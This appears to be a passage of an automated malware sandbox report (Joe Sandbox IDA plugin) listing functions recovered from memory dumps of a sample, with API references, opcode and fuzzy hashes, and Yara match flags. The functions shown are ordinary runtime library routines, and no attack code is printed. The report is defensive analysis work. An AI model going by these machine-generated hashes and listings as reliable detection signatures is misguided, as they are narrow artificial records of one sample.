Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415312

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: 68d129af9073e170e0bd2ed5c1ca810268e1faaa5ea0560f3945f8c62b51e45f
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 8B619B72A00715DFDB18CFA5E8D26EEB7B1FB84316F24806ED45697242D738A981CF48

Function 024A0C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 024A0C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024A0C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024A0CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024A0D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024A0D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024A0D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024A0D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024A0D80
__CxxThrowException@8.LIBVCRUNTIME ref: 024A0DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024A0DBC

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: 10daa1dcfb88a4d8b5ad48e1a0e43cfeaab409df032b99148b1bbd94d4ebfce7
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: C741E571A042089BCF19FFA5C4647EE7BA6AF22304F04406FD8465B382CF759A09CF66

Function 024B204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B2061

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024B206D
_free.LIBCMT ref: 024B2078
_free.LIBCMT ref: 024B2083
_free.LIBCMT ref: 024B208E
_free.LIBCMT ref: 024B2099
_free.LIBCMT ref: 024B20A4
_free.LIBCMT ref: 024B20AF
_free.LIBCMT ref: 024B20BA
_free.LIBCMT ref: 024B20C8

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 192fda9dc25ff0fe950178ab54c2a0ae022822eee28bf341ce0b93ec51d0ee92
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: DB117775600108AFCB52EF66C841CD93FA6EF04750B5140AABA094F221D771EE60EF60

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

asin, xrefs: 0043F031
pow, xrefs: 0043EFA9, 0043F055, 0043F068
acos, xrefs: 0043F03D
log10, xrefs: 0043EF0F, 0043EF5F
log, xrefs: 0043EF6B, 0043EF77
exp, xrefs: 0043EF8A, 0043EFEC
sqrt, xrefs: 0043F049

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 024B3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: c30e0025f48e379c8364d3ff4673cd5a9d769290eec4118bb3ca1b6504002b8c
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: BDC1B274E04245AFDB17DFAAC840BEEBFB5AF09314F04419AE414AB391C7749942CB71

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

fB, xrefs: 004287AE, 004287B7, 004287C8
csm, xrefs: 004287A6

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 0249C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0249C6DC
atomic_compare_exchange.LIBCONCRT ref: 0249C700
std::_Cnd_initX.LIBCPMT ref: 0249C711
std::_Cnd_initX.LIBCPMT ref: 0249C71F

Part of subcall function 02481370: __Mtx_unlock.LIBCPMT ref: 02481377

std::_Cnd_initX.LIBCPMT ref: 0249C72F

Part of subcall function 0249C3EF: __Cnd_broadcast.LIBCPMT ref: 0249C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0249C73D

Strings

t#D, xrefs: 0249C6C2

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: 4907e0a9ff6aff853fcbd1f913a4c98d432ceb0e9437733168729e7620dc4747
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 1001F271900605ABDF11FBA2DD84B9EBB6AAF04310F14005BE90597680EBB8AA158F92

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 024B1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9

_free.LIBCMT ref: 024B1444
_free.LIBCMT ref: 024B145D
_free.LIBCMT ref: 024B148F
_free.LIBCMT ref: 024B1498
_free.LIBCMT ref: 024B14A4

Strings

C, xrefs: 024B1291

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: 4bf953046ae8e99d889f96c5396d38a94d44d558edc225a5407ee5812131ea11
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: AAB12775A012199BDB26DF29C894BEEB7B5FF08304F1445AAD80DA7350E770AE90CF50

Function 024BA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024BA184
_free.LIBCMT ref: 024BA192
_free.LIBCMT ref: 024BA2C0
_free.LIBCMT ref: 024BA2CB

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 0b74a76594ba4baed379928a0c5dab0215b6a522704d77e73e38190dbbe0bcf9
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: 3E61D171D00215AFDB26CFA9C841BDABBF6EF48710F2441ABE844EB341D771A981CB60

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 024B3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,024AC4A4,E0830C40,?,?,?,?,?,?,024B425F,0248E03C,024AC4A4,?,024AC4A4,024AC4A4,0248E03C), ref: 024B3B2C
__fassign.LIBCMT ref: 024B3BA7
__fassign.LIBCMT ref: 024B3BC2
WideCharToMultiByte.KERNEL32(?,00000000,024AC4A4,00000001,?,00000005,00000000,00000000), ref: 024B3BE8
WriteFile.KERNEL32(?,?,00000000,024B425F,00000000,?,?,?,?,?,?,?,?,?,024B425F,0248E03C), ref: 024B3C07
WriteFile.KERNEL32(?,0248E03C,00000001,024B425F,00000000,?,?,?,?,?,?,?,?,?,024B425F,0248E03C), ref: 024B3C40

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: 304ffd4f9296eaba08644137e6ec93464c4e4940ae2de905874f064e7a01c169
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: 1651E475900208AFDB11CFA9D884AEEBBF4EF09701F1441AFE555E7291E7309A81CF60

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 024A4AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024A4ACD

Part of subcall function 024A4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024A4800), ref: 024A4DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024A4AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A4AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 024A4AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024A4B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A4BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 024A4BC3

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: c7ce8f428c2cfad80e7a49426ad3e0874cbc2eccb3bb0d8ae1723269abb717b2
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: D331B439A002149BCF04EF69C8A1B6EB3B6FF54710F20456BD9159B381DBB0EA05CB94

Function 024BFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: 3d909a4b5b6762711c542bdc472c1f88c6bdb8b3e6dd532265786691cd7f5b8a
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: 0011D631604115BBDB222F77CC589AB7A6DFF82B21B110A2BFC19C7240DB308885CAB0

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 024BA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024BA331: _free.LIBCMT ref: 024BA35A

_free.LIBCMT ref: 024BA638

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024BA643
_free.LIBCMT ref: 024BA64E
_free.LIBCMT ref: 024BA6A2
_free.LIBCMT ref: 024BA6AD
_free.LIBCMT ref: 024BA6B8
_free.LIBCMT ref: 024BA6C3

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 082890d3969e0dbd7c6e4566ddb332ede1ee3d406a60d49ca7e7f1856f658f1b
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: E1115171644B14AADE32BBB3CC45FCF7BDEDF00B00F40082FA299AA150DAA5B5145E60

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 02492659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 02492667
GetLastError.KERNEL32 ref: 0249266D
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 0249269A
GetLastError.KERNEL32 ref: 024926A4
GetLastError.KERNEL32 ref: 024926B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024926CC
__CxxThrowException@8.LIBVCRUNTIME ref: 024926DA

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: faecae0fd15cc66c1acda4ae3ac3027a44ce648a615dc82bfdd9fbbbbd9a7793
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: 9A018435501115BBDB24FF66EC48FAF3F6DAF42F52B50042BF905D2560DBA4DD048AA8

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412400
GetLastError.KERNEL32 ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412433
GetLastError.KERNEL32 ref: 0041243D
GetLastError.KERNEL32 ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

